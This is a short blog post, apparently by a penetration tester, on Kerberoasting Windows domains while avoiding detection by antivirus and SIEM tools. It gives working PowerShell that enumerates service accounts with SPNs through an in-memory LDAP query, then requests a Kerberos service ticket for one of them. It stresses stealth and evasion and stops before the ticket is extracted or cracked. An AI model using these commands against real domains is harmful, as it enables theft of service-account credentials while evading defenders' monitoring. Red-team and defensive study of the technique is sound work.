Kerberoasting - In Windows without Detection

The usual methods of Kerberoasting usually get flagged when you try to extract the ticket from your local machine cache after requesting it.
This is usually because the method to do this involves mimikatz.
Although i love the functionality of mimikatz, every AV, SIEM, IDS/IPS is trying to block it as the tools becomes ever more popular.

The below method uses a different tool that *so far* (40 Site Pentests) hasn't triggered alerts.

 Take the scenario of Windows server 2019 - Only need the one machine as the DC as the requesting of tickets from other machines is irrelevant to kerberoasting.

Firstly lets use an LDAP Query from in memory, as to stay stealthy and not touch disk to return a list of SPN's that are associated to services related to Service Accounts.
(Hit Enter twice and wait a short minute)

#Build LDAP Filter to look for users with SPN values registered for current domain
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
#Execute Search
$results = $search.FindAll()
#Display SPN values from the returned objects
foreach ($result in $results)
{
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User Name = " $userEntry.name
    foreach ($SPN in $userEntry.servicePrincipalName)
    {
        Write-Host "SPN = " $SPN       
    }
    Write-Host ""    
}

We get the output as expected as shown below.

Next we request any ticket that we find lke so:


Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "PENTESTLAB_001/WIN-PTELU2U07KG.PENTESTLAB.LOCAL:80"

No comments:

Post a Comment